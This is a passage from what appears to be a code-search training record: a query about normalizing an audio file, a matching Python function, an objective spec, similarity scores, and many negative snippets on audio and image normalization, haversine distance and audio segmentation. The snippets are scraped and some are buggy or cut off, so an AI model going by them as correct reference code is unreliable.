np.sin(dlat / 2.) ** 2 + np.cos(lat1) * np.cos(lat2) * np.sin(dlon / 2.) ** 2\n c = 2. * np.arctan2(np.sqrt(a), np.sqrt(1 - a)) \n return r_E * c", "def calcDistance(lat1, lon1, lat2, lon2):\n # convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n # haversine formula \n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a)) \n km = 6367 * c\n return km * 1000", "def dist_between(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = map(np.radians, [lon1, lat1, lon2, lat2])\n # haversine formula \n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = np.sin(dlat/2)**2 + np.cos(lat1) * np.cos(lat2) * np.sin(dlon/2)**2\n c = 2 * np.arcsin(np.sqrt(a)) \n km = 6367 * c\n return km", "def getDist(lat1,long1,lat2,long2):\n\tlat1 = math.radians(lat1)\n\tlong1 = math.radians(long1)\n\tlat2 = math.radians(lat2)\n\tlong2 = math.radians(long2)\n\tR = 6371 # km\n\td = cmath.acos(cmath.sin(lat1) * cmath.sin(lat2) + \\\n\tcmath.cos(lat1) * cmath.cos(lat2) *\n\tcmath.cos(long2 - long1)) * R\n\treturn abs(d) # cast to float", "def haversine(p: np.ndarray, q: np.ndarray) -> float:\n d = q - p\n a = (math.sin(d[0] / 2.0) ** 2 + math.cos(p[0]) * math.cos(q[0]) * math.sin(d[1] / 2.0) ** 2)\n\n c = 2 * math.atan2(math.sqrt(a), math.sqrt(1.0 - a))\n return c", "def haversin(lat1, lon1, lat2, lon2):\n r = 3956.545 # Radius of the Earth in miles\n\n # Conver to radians\n lat1 = np.pi/180*lat1\n lon1 = np.pi/180*lon1\n lat2 = np.pi/180*lat2\n lon2 = np.pi/180*lon2\n\n # Haversin formula\n d = 2*r*np.arcsin(np.sqrt(\\\n np.sin((lat2 - lat1)/2)**2 + \\\n np.cos(lat1) * np.cos(lat2)*\\\n np.sin((lon2 - lon1)/2)**2))\n return d", "def calculateDistanceBetweenPoints(lat1,lon1,lat2,lon2):\n\treturn Geodesic.WGS84.Inverse(lat1,lon1, lat2, lon2)['s12']" ]
[ "0.7411768", "0.7283244", "0.7281911", "0.7275467", "0.7160516", "0.7140681", "0.71359766", "0.706824", "0.7068029", "0.7050806", "0.70261496", "0.70184296", "0.69995123", "0.6997063", "0.69919103", "0.6987301", "0.69823533", "0.69742984", "0.6964179", "0.6947977", "0.69358677", "0.69334304", "0.69272494", "0.69211227", "0.6918978", "0.6909981", "0.6909981", "0.6901357", "0.6889008", "0.68778425", "0.6874001", "0.68734324", "0.68640924", "0.6861169", "0.6858368", "0.6854334", "0.6842126", "0.6839374", "0.68383026", "0.68373865", "0.6834038", "0.6821812", "0.68176484", "0.68166286", "0.68137693", "0.6813559", "0.681231", "0.68098414", "0.68076986", "0.6797198", "0.679279", "0.6790279", "0.6788969", "0.67869496", "0.6779699", "0.6771567", "0.6771567", "0.677075", "0.6770084", "0.6768476", "0.67624235", "0.6761354", "0.67589474", "0.6757291", "0.67524016", "0.6750482", "0.67486525", "0.67407066", "0.6737854", "0.6728046", "0.6720459", "0.6713002", "0.6710954", "0.67070025", "0.66998595", "0.6686567", "0.6685601", "0.667424", "0.6668778", "0.6626024", "0.66097885", "0.65984124", "0.65743935", "0.65095794", "0.64745677", "0.6464404", "0.6438525", "0.64315045", "0.642898", "0.6427349", "0.6425216", "0.64188", "0.6379387", "0.63729846", "0.6353277", "0.6343097", "0.633548", "0.63291574", "0.63105005", "0.6306423" ]
0.71147573
7
Normalize audio file to range [1, 1]
def normalize(audio): norm = audio/max(audio) return norm
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def normalize(filename,wout=True):\n n, data, data_dB,sr,ch=inputwav(filename)\n if ch==1:\n diff=0-max(data_dB)\n if ch==2:\n d1=0-max(data_dB[:,0])\n d2=0-max(data_dB[:,1])\n diff=max(d1,d2)\n print('Adding '+str(diff)+' dB...')\n data_dB_norm=data_dB+diff\n data_norm=10.0**((data_dB_norm)/20.0)\n #sign the bits appropriately:\n for k in range (ch):\n for i in range (n):\n if data[i,k]<0.0:\n data_norm[i,k]=-1.0*data_norm[i,k]\n if wout==True:\n print('Exporting...')\n sf.write(filename[0:len(filename)-4]+'_normalized.wav',data_norm,sr,'PCM_16')\n print('Done!')\n return data_norm", "def normalize(wav, flux):\n return flux / flux.max() # maximum flux = 1\n\n # flux_norm = flux[wav>wav_norm][0]\n # return flux / flux_norm", "def normalize_audio(audio_path: str, output_path: str, name: str):\n sound = AudioSegment.from_file(audio_path + os.sep + name + '.wav',\n \"wav\")\n change_in_d_bfs = (-20.0) - sound.dBFS\n sound = sound.apply_gain(change_in_d_bfs)\n sound.export(output_path + os.sep + name + '.wav', format=\"wav\")", "def normalize(volume):\n\n MIN_BOUND = 0\n MAX_BOUND = 256.0\n volume = (volume - MIN_BOUND) /(MAX_BOUND - MIN_BOUND)\n volume[volume > 1] = 1 #Clip everything larger than 1 and 0\n volume[volume < 0] = 0\n volume = (volume*255).astype('uint8')\n\n return volume", "def normalize(volume):\n\n MIN_BOUND = 0\n MAX_BOUND = 256.0\n volume = (volume - MIN_BOUND) /(MAX_BOUND - MIN_BOUND)\n volume[volume > 1] = 1 #Clip everything larger than 1 and 0\n volume[volume < 0] = 0\n volume = (volume*255).astype('uint8')\n\n return volume", "def normalize(volume):\n max = np.amax(volume)\n if max == 0:#Fixes dividing by 0 error if nothing in the volume\n return volume.astype(np.uint8)\n\n normalized = volume * (255.0 / max)\n normalized = np.round(normalized).astype(np.uint8)\n return normalized", "def normalize_sample(sample_data):\n BASE = 255\n sample_data = np.array(sample_data, dtype='float32')\n return sample_data/BASE", "def normalize(self,arr):\n arr = arr/(arr.max()/255.0)\n return arr", "def normalize(image):\n return image / 127.5 - 1.", "def normalize(image):\r\n return image / 127.5 - 1.", "def normalize_frames(frames):\n new_frames = frames.astype(np.float32)\n new_frames /= (255 / 2)\n new_frames -= 1\n\n return new_frames", "def normalize_signal(signal):\n gain = 1.0 / (np.max(np.abs(signal)) + 1e-9)\n return signal * gain", "def normalize(array):\n high = array.max()\n low = array.min()\n rng = high - low\n array[:] = 1.0 - ((high - array) / rng)", "def normalize_01(x):\n return x / 255.0", "def normalise(image):", "def normalize(img):\n img = np.clip(img, 0, 255).astype(np.uint8)\n return img / 255", "def normalize(sample, maxval):\n sample = (2 * (sample.astype(np.float32) / maxval) - 1.) * 1024\n #sample = sample / np.std(sample)\n return sample", "def _normalize_(x: np.array) -> np.array:\n if x.max() != 0:\n x = x / x.max()\n return np.clip(x, 0, 1)# ensure that no values are >1\n else:\n raise ZeroDivisionError('Image Normalization')", "def normalize(array):\n\treturn array/np.max(array)", "def normalize(x):\n # TODO: Implement Function\n \n return x/255", "def normalize_volumes_mixmode(directory, amplitude=0.08, ext='.wav'):\n subdirectories = [x[0] for x in os.walk(directory)]\n for subdirectory in subdirectories:\n os.system(f\"normalize-audio -w 16 -a {amplitude} -b '{subdirectory}/'*{ext}\")", "def normalize(img):\n img = img.astype(np.float32)\n img -= img.min()\n img /= img.max()\n img *= 255\n img = img.astype(np.uint8)\n\n return img", "def normalize(self, ref=1):\n maximum = max(abs(self.intensities))\n return Spectrum(self.wavelengths, ref * self.intensities/maximum)", "def normalize(array):\n array_min, array_max = array.min(), array.max()\n return ((array - array_min)/(array_max - array_min))", "def normalize_audio_feature(audio_feature, per_feature=False):\n axis = 0 if per_feature else None\n mean = np.mean(audio_feature, axis=axis)\n std_dev = np.std(audio_feature, axis=axis) + 1e-9\n normalized = (audio_feature - mean) / std_dev\n return normalized", "def normalize(arr):\n arr = arr.astype('float')\n # Do not touch the alpha channel\n for i in range(1):\n minval = arr[...,i].min()\n maxval = arr[...,i].max()\n if minval != maxval:\n arr[...,i] -= minval\n arr[...,i] *= (255.0/(maxval-minval))\n return arr", "def normalize(av, vmin=0., vmax=1.):\n if vmin == vmax:\n return np.ones_like(av)*vmin\n elif vmax < vmin:\n warnings.warn(\"swapping vmin and vmax, because vmax < vmin.\")\n vmin, vmax = vmax, vmin\n\n norm_one = (av - np.min(av))/(np.max(av)-np.min(av))\n return norm_one * (vmax-vmin) + vmin", "def normalize(batch_img: np.ndarray) -> np.ndarray:\n batch_img = batch_img.astype('float32')\n return batch_img / 127.5 - 1", "def apply_fourier_transform(chunked_audio):\n pass", "def normalize(x):\n # TODO: Implement Function\n data_max = np.max(x)\n data_min = np.min(x)\n x = (x - data_min) / (data_max - data_min)\n return x", "def normalise_0_1(arraylike):\n array_min = np.min(arraylike)\n array_max = np.max(arraylike)\n normalised = (arraylike - array_min) / (array_max - array_min)\n # convert to float\n normalised = np.array(normalised).astype(float)\n return normalised, array_min, array_max", "def min_max_normalize_one_image(image):\n\n image = image.astype(np.float32)\n for i in range(len(image)):\n max_int = image[i].max()\n min_int = image[i].min()\n image[i] = (image[i] - min_int) / (max_int - min_int)\n\n return image", "def normalize(self, factor):", "def _normalize(array):\n\treturn (array - np.min(array))/(np.max(array)-np.min(array))", "def wavread(filename):\n\n\tif (os.path.isfile(filename) == False): # raise error if wrong input file\n\t\traise ValueError(\"Input file is wrong\")\n\n\tfs, x = read(filename)\n\n\tif (len(x.shape) !=1): # raise error if more than one channel\n x = np.mean(x,axis = 1)\n\t\tprint \"Audio file is stereo, converting to mono\"\n\n\t#scale down and convert audio into floating point number in range of -1 to 1\n\tx = np.float32(x)/norm_fact[x.dtype.name]\n\treturn fs, x", "def normalize(v):\n\n return v * (1.0 / magnitude(v))", "def remove_silence_audio() -> None:\n # Read the wav file and get rate and list of data\n rate, data = scipy.io.wavfile.read('Test.wav')\n\n # Create list for data of amended wav file\n data2 = []\n\n # Loop through data of original file and add data that doesn't meed condition: values >= -10 and <= 10\n for i in range(len(data)):\n if data[i][0] >= -10 and data[i][0] <= 10:\n pass\n else:\n data2.append(data[i])\n\n # Create NumPy array from revised data\n data2 = np.asarray(data2, dtype=np.int16)\n\n # Write new data to wav file\n scipy.io.wavfile.write('Test.wav', rate, data2)\n\n return None", "def normalize_image(image):\n return image / 255.", "def data_normalize (self, data):\r\n data = data + (2**15)\r\n data = data / ((2**16) - 1)\r\n data = 2 * data\r\n data = data - 1\r\n\r\n return data", "def normalization(sample):\n sample = sample + 100\n # 2^20 = 1048576\n return np.log2(sample * 1048576/np.sum(sample))", "def normalization(image):\n return (image - np.min(image)) / (np.max(image) - np.min(image))", "def normalizeToRange(data,max=255,min=0):\n if min: return (max-min)*normalize(data)+min\n else: return max*normalize2(data) # speeds up operation", "def normalize_image(image):\n image = image.astype(np.float32) / 255.0\n\n return image", "def range_as_mono(self, start_sample, end_sample):\n tmp_current = self.current_frame\n self.current_frame = start_sample\n tmp_frames = self.read_frames(end_sample - start_sample)\n if self.channels == 2:\n frames = np.mean(tmp_frames, axis=1)\n elif self.channels == 1:\n frames = tmp_frames\n else:\n raise IOError(\"Input audio must have either 1 or 2 channels\")\n self.current_frame = tmp_current\n return frames", "def normalise(self, spectrum):\n\n return spectrum", "def normalise(self, spectrum):\n\n return spectrum", "def itensity_normalize_one_volume(volume):\n pixels = volume[volume > 0]\n mean = pixels.mean()\n std = pixels.std()\n out = (volume - mean)/std\n out_random = np.random.normal(0, 1, size = volume.shape)\n out[volume == 0] = out_random[volume == 0]\n return out", "def itensity_normalize_one_volume(volume):\n pixels = volume[volume > 0]\n mean = pixels.mean()\n std = pixels.std()\n out = (volume - mean)/std\n # random normal too slow\n #out_random = np.random.normal(0, 1, size = volume.shape)\n out_random = np.zeros(volume.shape)\n out[volume == 0] = out_random[volume == 0]\n return out", "def normalize_array(image_array):\n\n array = image_array.astype(np.float)\n array /= 255.0\n return array", "def normalize(self, headroomInDB):\n self.headroom = headroomInDB\n print (\"Normalizing %s to %1.3f dB limit of max.\" \n % (self.audiofile, self.headroom))", "def normalize(image):\n min = np.min(image)\n max = np.max(image)\n normalImg = 255*(image - min) / (max - min)\n return normalImg", "def normalize(self, mag=1.0):\n\n def f(dataset, s, null, mag):\n dataset[s] -= null\n dataset[s] /= mag\n\n if self.signed:\n mag = self.mag() / mag\n else:\n mag = self.max() / mag\n self.chunkwise(f, null=self.null, mag=mag)\n self._null = 0", "def normalise(dataset):\n # Scale images to the [0, 1] range\n dataset = dataset.astype(\"float32\") / 255\n # Make sure images have shape (28, 28, 1)\n return np.expand_dims(dataset, -1)", "def normalize(arr):\n m = np.min(arr)\n arr = arr - m\n M = np.max(arr)\n arr = arr / M\n return arr", "def normalize_to_zero_one(x):\n return x - torch.min(x) / (torch.max(x) - torch.min(x))", "def normalise(self):\n return self.map_channels(lambda component: float(component) / 255.0)", "def normalize(self):\n self.image = rescale_intensity(self.image, out_range=(0, 255))", "def normalize2(data):\n return old_div(data,np.max([np.max(data),-1.0*np.min(data)]))", "def normalize_volume(vol_data):\n h, w, d = np.shape(vol_data)\n mean = np.sum(vol_data)/(h*w*d)\n std = np.std(vol_data)\n return (vol_data - mean) / std", "def normalize(image):\n image = image.astype(np.float32)\n mean = np.mean(image)\n std = np.std(image)\n if std > 0:\n ret = (image - mean) / std\n else:\n ret = image * 0.\n return ret", "def normalize(x):\n a = 0\n b = 1\n scale_min = 0\n scale_max = 255\n return a + ( ( (x - scale_min)*(b - a) )/( scale_max - scale_min ) )", "def denormalize(data):\n\treturn np.int16(data/np.max(np.abs(data)) * 32767)", "def normalize(img):\r\n return ((img / 255.0) - 0.5) / 0.5", "def normalize_data(data=None):\n # Data pre-processing\n n = data.shape[0]\n for i in range(n):\n xx = data[i,:,:]\n xx -= np.mean(xx) # Centering in 0\n xx /= np.linalg.norm(xx) # Normalizing to 1\n data[i] = xx # Affect value\n return data", "def normalise( self, rWantedMax = 100. ):\n nWantedMax = int( self.getSampleMaxValue() * rWantedMax / 100)\n nCurrentMax = max( self.data.max(), -self.data.min() )\n rRatio = nWantedMax / float(nCurrentMax)\n if( nCurrentMax == nWantedMax ):\n return False\n logging.info( \"nCurrentMax: %s\" % nCurrentMax )\n logging.info( \"nWantedMax: %s\" % nWantedMax ) \n logging.info( \"applying a %f ratio to the whole sound\" % rRatio )\n self.data *= rRatio # another option is to make a np.round(self.data*rRatio), but it's perhaps less linear (on a linear elevation for example)\n return True", "def unnormalize_sample(sample_data):\n BASE = 255\n return np.array(np.around(sample_data*BASE), dtype='uint8')", "def normalize_image(img):\n min_, max_ = float(np.min(img)), float(np.max(img))\n return (img - min_) / (max_ - min_)", "def normalize(a, new_max=1.0):\n a = (a - a.min())\n a = a/a.max()\n a *= new_max\n return a", "def normalize_data_unit_interval(data):\n if data.dtype == 'float32':\n return\n return data.astype('float32') / 255.0", "def normalize(data):\n min = np.min(data)\n if min:\n data = data + min\n return old_div(data,np.max(data))\n else: # if min is 0\n return old_div(data,np.max(data))", "def _normalize(self, x):\n # TODO: imagenet normalization\n\n return x", "def normalize(im: np.ndarray) -> np.ndarray:\n im = im.astype(np.float32)\n return (im - im.min()) / (im.max() - im.min())", "def normalize(self):\n d = learning_utils.convert_data_to_2d(self._data)\n d = learning_utils.normalize_2d(d)\n self._data = learning_utils.convert_data_to_1d(d)", "def normalize(array):\n quat = np.array(array)\n return quat / np.sqrt(np.dot(quat, quat))", "def read_audiofile(audio_name,cutToLength):\n fs, data = wavfile.read(audio_name)\n # sa.play_buffer(audio_data, num_channels, bydeftes_per_sample,sample_rate)\n #play_obj = sa.play_buffer(data,1,2,fs)\n #play_obj.stop()\n # delete one column. Make mono channel\n if data.shape[1]>1:\n data = numpy.delete(data,1,1)\n #downsample if signal is broad\n if fs>24000:\n data = numpy.delete(data, numpy.s_[::2], 0)\n fs = int(fs/2)\n \n data = data[data!=0]\n data = numpy.delete(data,numpy.s_[ int(cutToLength*fs):len(data)] )\n return data", "def cut_audio(old_path, new_path, start, end):\r\n fs, data = wavfile.read(old_path)\r\n indx_start = int(start*fs)\r\n indx_end = int(end*fs)+1\r\n wavfile.write(new_path,fs,data[indx_start:indx_end])\r\n\r\n return True", "def scale0to1(img):\r\n\r\n img = img.astype(np.float32)\r\n\r\n min = np.min(img)\r\n max = np.max(img)\r\n\r\n if np.absolute(min-max) < 1.e-6:\r\n img.fill(0.5)\r\n else:\r\n img = (img-min) / (max-min)\r\n\r\n return img.astype(np.float32)", "def normalize(data):\n\n\t#return [float(x) / pow(2, 15) for x in data]\n\n\tl = [float(x) / pow(2, 15) for x in data]\n\treturn np.asarray(l)", "def _normalize_range():\n clipped = tf.clip_by_value(inputs, self.minimum, self.maximum)\n return -1 + 2 * (clipped - self.minimum) / length", "def normalize(image, label):\n image -= settings.DATASET_MEAN\n image /= settings.DATASET_STD\n\n return image, label", "def _normalize(self):\r\n self.dataframe['norm_intensity'] = self.dataframe['intensity']\r\n self.dataframe['norm_intensity'] -= self.dataframe['norm_intensity'].min()\r\n self.dataframe['norm_intensity'] /= self.dataframe['norm_intensity'].max() * 0.01", "def normalization(seq):\n\t\tnew_seq = [6.3578286171 * x for x in seq]\n\t\treturn new_seq", "def normalize_image(img_arr_uint):\n return img_arr_uint.astype(np.float64) * ONE_BYTE_SCALE", "def normalize(self):\n self._data /= self.norm()", "def __normalize(input, type, a, b):\n return cv2.normalize(input, None, a, b, type)", "def normalize(img):\r\n min = img.min()\r\n max = img.max()\r\n x = 2.0 * (img - min) / (max - min) - 1.0\r\n return x", "def normalize(self, m1=0., m2=1.):\n self.img = self.img - self.img.min()\n self.img = self.img / self.img.max()\n\n self.img = self.img * (m2 - m1) + m1", "def normalize_image(img):\n\n # Load image and convert to grayscale\n img = rgb2gray(img)\n\n # Normalize values, range 0 to 255\n img = (img - img.min()) / (img.max() - img.min())\n img *= 255\n\n # Make int values\n img = img.astype(int)\n\n # Return new image\n return img", "def normalize(img):\n # TODO: implement this function.\n min_img = min([min(i) for i in img])\n max_img = max([max(i) for i in img])\n\n for i in range(len(img)):\n \tfor j in range(len(img[0])):\n \t\timg[i][j] = ((img[i][j] - min_img) / (max_img - min_img))\n #raise NotImplementedError\n return img", "def normalized(array):\n ptp = np.ptp(array)\n if ptp == 0:\n ptp = 1\n return (array - np.min(array)) / ptp", "def normalize(arr: np.ndarray) -> np.ndarray:\n if max(arr) - min(arr) == 0:\n logger.warning(\n \"Normalize averted a div/0, the input data was:\\n {0}\".format(arr)\n )\n return np.ones(len(arr))\n return (arr - min(arr)) / (max(arr) - min(arr))", "def normalization(img):\n max_val = img.max()\n min_val = img.min()\n\n return ((img-min_val)*255)/(max_val-min_val)", "def normalise_image(image, use_torch=True):\n if use_torch:\n image = torch.abs(image)\n else:\n image = np.abs(image)\n if (image.max() - image.min()) < 1e-5:\n return image - image.min() + 1e-5\n else:\n return (image - image.min()) / (image.max() - image.min())", "def normalize_image(img):\n arr = np.array(img)\n new_img = Image.fromarray(normalize(arr).astype('uint8'),'L')\n return new_img", "def normalize_and_clip(meas):\n frequency_weights = np.zeros(len(meas))\n\n for i in range(len(meas)):\n if(meas[i] > NORMALIZE_SENS[i]):\n meas[i] = NORMALIZE_SENS[i]\n frequency_weights[i] = meas[i] / NORMALIZE_SENS[i]\n\n return frequency_weights", "def normalise(values):\n max_value = max(values)\n min_value = min(values)\n factor = 32767.0 / max(max_value, abs(min_value))\n return (int(v * factor) for v in values)", "def normalize(img):\n tol = 355\n maxi = np.max(img)\n if maxi > tol:\n img = 255 * (img - (tol - 255)) / maxi\n # end if\n\n norm = np.round(img)\n norm[norm < 0] = 0\n norm[norm > 255] = 255\n\n return norm", "def normalize_image(im):\n pixels = im.flatten()\n\n # scale pixels to range 0 to 1\n normalized_im = (pixels - np.min(pixels)) / (np.max(pixels) - np.min(pixels))\n\n # scale the pixels by 255\n normalized_im = (normalized_im.reshape(im.shape) * 255).astype(np.uint8)\n\n return normalized_im", "def normalize(data):\n data_range = data.max() - data.min()\n #if data_range == 0.:\n # sys.exit(\"data.max() - data.min() == 0. !\")\n if stddev != 0.:\n data = (data - data.min()) / data_range\n\n return data", "def minmax_normalize(samples, out=None):\n if out is None:\n dtype = np.common_type(np.empty(0, 'float32'), samples)\n out = np.array(samples, dtype=dtype, copy=True)\n else:\n out[:] = samples\n\n sample_mins = np.min(samples, -1)[..., None]\n sample_maxes = np.max(samples, -1)[..., None]\n out -= sample_mins\n out /= (sample_maxes - sample_mins)\n return out" ]
[ "0.6990606", "0.69585127", "0.6922056", "0.6835355", "0.6835355", "0.66305023", "0.64685136", "0.64316094", "0.6400724", "0.6398994", "0.63599336", "0.6334538", "0.63280183", "0.62815994", "0.62611055", "0.62473464", "0.6237534", "0.6221386", "0.6176301", "0.6140515", "0.6132791", "0.6123954", "0.60941035", "0.6029671", "0.6020562", "0.6014642", "0.59951377", "0.597458", "0.59674263", "0.59554684", "0.59541005", "0.59539086", "0.59530973", "0.59443635", "0.5933671", "0.59287375", "0.5926318", "0.59221166", "0.5910866", "0.5906473", "0.5906419", "0.5900829", "0.5878886", "0.5872488", "0.5871823", "0.5871823", "0.58546907", "0.5852504", "0.5849053", "0.58447987", "0.5843516", "0.5838141", "0.58376426", "0.5831355", "0.58088994", "0.58076394", "0.5799226", "0.5794051", "0.5790485", "0.5772984", "0.5760764", "0.57605433", "0.57459086", "0.5745667", "0.57441515", "0.57316947", "0.57308096", "0.57295924", "0.5724631", "0.5719238", "0.5715826", "0.57121783", "0.5709629", "0.5707682", "0.5695518", "0.56933105", "0.56827265", "0.5679549", "0.5677347", "0.56761014", "0.5667166", "0.5663434", "0.5659912", "0.56489897", "0.56477076", "0.5643934", "0.5643317", "0.5640471", "0.5633311", "0.5617787", "0.56072813", "0.5605533", "0.55942214", "0.5590934", "0.5582964", "0.5581116", "0.55779654", "0.55760396", "0.55708295", "0.5564736" ]
0.78221744
0
Load an audio file and divide into 10 second segments.
def segment_10s(audio, sr): seg_files = {} n_seg = int((len(audio)/sr)/10) for i in range(n_seg): segment = audio[10*i*sr:(i+1)*10*sr] seg_files[i] = segment return seg_files
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __init__(self, secs, path, concat=True):\n audio = np.empty((1,))\n secs_loaded = 0\n files_loaded = 0\n files = glob.glob(path + \"*.wav\")\n for file in files:\n (sr, samples) = wavfile.read(file)\n audio = np.concatenate((audio, samples))\n\n # Keep track of the duration (in seconds) of our audio clip\n dur = len(samples) / sr\n secs_loaded = secs_loaded + dur\n files_loaded = files_loaded + 1\n if (secs_loaded >= secs):\n break\n if not concat:\n break\n \n # We're assuming that all files use the same sampling frequency.\n # Truncate audio samples so that we end up with the duration specified.\n total_samples = int(round(secs * sr))\n if total_samples > len(audio):\n warnings.warn(\"Found fewer than %.2f seconds of audio. \"\n \"Returning %.2f seconds of audio.\" % (secs, len(audio) / sr)) \n audio = audio[0:total_samples]\n\n self.audio = audio\n self.sampling_rate = sr", "def filesample(filename):\n sampling_rate, samples = wavfile.read(filename)\n times = np.arange(len(samples)) / sampling_rate\n return samples, sampling_rate", "def load_audio(file_path):\n # load the audio file in its original sampling rate\n audio_data, sr = librosa.load(file_path, sr=sampling_rate)\n\n # get the common file name\n file_name = file_path.split(\"/\")[-1]\n file_name = file_name.split(\".wav\")[0]\n\n # calculate number of samples in the time duration needed\n num_samples = int(sr*time_duration)\n\n # get the cut-off audio signals and save them\n for i in np.arange(num_audio_files):\n audio_cut_data = cut_sample(audio_data, num_samples)\n file_path=dir_to_save + file_name + \"_\" + str(i+1) + \".wav\"\n save_sample(audio_cut_data, file_path, sr)\n print(f\"generating signal {str(i)}, its length {len(audio_cut_data)} by cutting the original signal\")", "def segment(sound_file, spec_file, ms_step, pix_per_s, sound_output_dir, spec_output_dir):\n pix_per_ms = pix_per_s/1000\n sound = AudioSegment.from_wav(sound_file)\n start, stop = 0, ms_step\n start_pixel, stop_pixel = start*pix_per_ms, stop*pix_per_ms\n spec = Image.open(spec_file)\n chopping = True\n while stop <= len(sound):\n \n # Split sound\n chunk = sound[start:stop]\n chunk.export(sound_output_dir + sound_file.split(\"/\")[-1].split(\".\")[0] + \"_\" + str(start) + \"-\" + str(stop) + \".wav\", format=\"wav\")\n\n # Split spectrogram\n w, h = spec.size\n cropped_spec = spec.crop((start_pixel, 0, stop_pixel, h))\n cropped_spec.save(spec_output_dir + sound_file.split(\"/\")[-1].split(\".\")[0] + \"_\" + str(start) + \"-\" + str(stop) + \".png\")\n\n start += ms_step\n stop += ms_step\n start_pixel, stop_pixel = start*pix_per_ms, stop*pix_per_ms", "def load_audio(self):\n df = pd.read_csv(\"{dir}/iteration_{iter}.csv\".format(dir=self.directory, iter=self.iteration),\n usecols=[1, 2, 3])\n\n doa_from_file = df.iloc[0][1]\n wav_name = df.iloc[0][0]\n filename = \"{dir}/{wav_name}\".format(dir=self.directory, wav_name=wav_name)\n\n y, sr = librosa.load(filename, mono=False)\n\n y_8k = librosa.resample(y, sr, 8000)\n result_x = librosa.util.fix_length(y_8k, 8000)\n\n return result_x, doa_from_file", "def play_audio(filename):\n chunk = 1024\n wf = wave.open(filename, 'rb')\n pa = pyaudio.PyAudio()\n stream = pa.open(\n format=pa.get_format_from_width(wf.getsampwidth()),\n channels=wf.getnchannels(),\n rate=wf.getframerate(),\n output=True\n )\n data_stream = wf.readframes(chunk)\n while data_stream:\n stream.write(data_stream)\n data_stream = wf.readframes(chunk)\n stream.close()\n pa.terminate()", "def file_generator(files: list,\n segment_duration: float,\n sampleRate: int,\n db_thr: float or None = None,\n frame_length: int = 512,\n hop_length: int = 128,\n ) -> None:\n\n I = 0\n J = 0\n\n segment = np.zeros((int(segment_duration*sampleRate),))\n\n k = 0\n file_no = 0\n\n while True:\n if I >= len(segment):\n yield segment\n segment = np.zeros((int(segment_duration*sampleRate),))\n I = 0\n\n if k == 0 or J >= len(y):\n J = 0\n y, sr = librosa.core.load(files[file_no], mono=True, sr=sampleRate)\n file_no += 1\n\n if file_no == len(files):\n break\n\n # Normalize\n y = y/y.max()\n\n # Remix non-silent segments\n if db_thr is not None:\n # Figure out intervals of non-silence (NOTE: Is the threshold right? -- 60db quiet)\n intervals = librosa.effects.split(y, frame_length=frame_length, hop_length=hop_length, top_db=db_thr)\n\n # Remix according to those intervals\n y = librosa.effects.remix(y, intervals)\n\n if len(segment[I:]) >= len(y[J:]):\n segment[I:I+len(y[J:])] = y[J:]\n I = I + len(y[J:])\n J = J + len(y[J:])\n else:\n segment[I:] = y[J:J+len(segment[I:])]\n J = J + len(segment[I:])\n I = I + len(segment[I:])\n k += 1", "def read_audiofile(audio_name,cutToLength):\n fs, data = wavfile.read(audio_name)\n # sa.play_buffer(audio_data, num_channels, bydeftes_per_sample,sample_rate)\n #play_obj = sa.play_buffer(data,1,2,fs)\n #play_obj.stop()\n # delete one column. Make mono channel\n if data.shape[1]>1:\n data = numpy.delete(data,1,1)\n #downsample if signal is broad\n if fs>24000:\n data = numpy.delete(data, numpy.s_[::2], 0)\n fs = int(fs/2)\n \n data = data[data!=0]\n data = numpy.delete(data,numpy.s_[ int(cutToLength*fs):len(data)] )\n return data", "def silence_intervals(file_path,file_name):\r\n nsil_start_time=[]\r\n nsil_end_time=[]\r\n sil_start_time=[]\r\n sil_end_time=[]\r\n #read file \r\n audio, sample_rate = librosa.load(os.path.join(file_path,file_name))\r\n \r\n #silence extraction using librosa\r\n nsil_intv=librosa.effects.split(audio, top_db=30).astype('float32') / sample_rate\r\n \r\n #silence extraction using pyAudioanalysis\r\n # [Fs, x] = aIO.readAudioFile(os.path.join(file_path,file_name))\r\n # nsil_intv = np.array(aS.silenceRemoval(x, Fs, 0.020, 0.020, smoothWindow = 0.7, Weight = 0.3, plot = False))\r\n # print \"non-sil segments=\"+str(nsil_intv)\r\n\r\n #silence detection using webrtcvad (voice activity detection)\r\n #nsil_intv=np.array(vad_webrtcvad(file_path,file_name))\r\n\r\n\r\n dur=librosa.get_duration(y=audio, sr=sample_rate)\r\n print nsil_intv\r\n print dur\r\n print sample_rate\r\n curr_sil_start=0.0\r\n curr_sil_end=0.0\r\n for i in range(nsil_intv.shape[0]):\r\n nsil_start_time.append(nsil_intv[i][0])\r\n #sil_start_time=list(np.array(sil_start_time)/sample_rate)\r\n\r\n nsil_end_time.append(nsil_intv[i][1])\r\n #sil_end_time=list(np.array(sil_end_time)/sample_rate)\r\n\r\n for i in range(len(nsil_start_time)):\r\n curr_sil_end=nsil_start_time[i]\r\n sil_start_time.append(str(curr_sil_start))\r\n sil_end_time.append(str(curr_sil_end))\r\n curr_sil_start=nsil_end_time[i]\r\n\r\n print sil_start_time\r\n print sil_end_time\r\n return sil_start_time,sil_end_time", "def segment_audio(filename, y_value, split='train', clf='gender'):\n\n filepath = 'recordings/recordings/' + filename + '.mp3'\n audio, sr = librosa.load(filepath, sr=16000)\n audio = normalize(audio)\n\n # Add gender label to filename for later processing\n sex = y_value\n if sex == 'female':\n filename = '{}.F'.format(filename)\n else: filename = '{}.M'.format(filename)\n\n # Segment audio file\n seg_files = segment_10s(audio, sr)\n\n for key, val in seg_files.items():\n new_name = '{}.{}'.format(filename, key)\n sf.write('data/{}/{}/{}o.wav'.format(clf, split, new_name), val, sr)", "def audioRead(path):\n data, samplerate = sf.read(path)\n frames = data.shape[0]\n channels = len(data.shape)\n duration = 1/samplerate*frames\n return data, samplerate, path, duration, frames, channels", "def graph_spectrogram(audio_file):\n secs_per_spec = 10\n data, rate = librosa.core.load(audio_file)\n split_data = split_list_by_num_samples(data, rate * secs_per_spec)\n\n random.shuffle(split_data)\n\n # if songs longer than 100 seconds, take the first 10 images, since its shuffled\n if len(split_data) > 10:\n split_data = split_data[:10]\n\n pool = 